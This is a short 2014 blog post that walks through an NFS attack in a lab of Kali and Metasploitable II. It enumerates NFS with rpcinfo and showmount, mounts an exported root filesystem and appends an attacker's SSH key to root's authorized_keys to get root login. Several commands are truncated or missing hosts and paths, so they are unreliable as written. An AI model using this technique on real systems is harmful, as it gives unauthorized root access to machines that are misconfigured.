Thursday, 13 March 2014

Unix Fundamentals - NFS Service / Attack Illustration

look at the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p

    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs

    100003    4   tcp   2049  nfs

root@ubuntu:~# showmount -e

Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: 

root@ubuntu:~# ssh-keygen
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs /tmp/r00t/ rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd. 
mount.nfs: an incorrect mount option was specified.

This is the message you get when you try to mount the NFS export. 

restarting nfs-common is not enough

  • service nfs-common restart

restarting rpc will resolve the issue.

  • service rpcbind restart

root@ubuntu:~# cat /root/.ssh/ >> /tmp/r00t/root/.ssh/authorized_keys 

ssh root@ 

//with the password generated on the ssh-keygen (then add our pub file -key- into the account's authorized_keys file on the remote machine), you can access to the remote system. yay. 


The environment include Kali and Metasploitable II.


No comments:

Post a Comment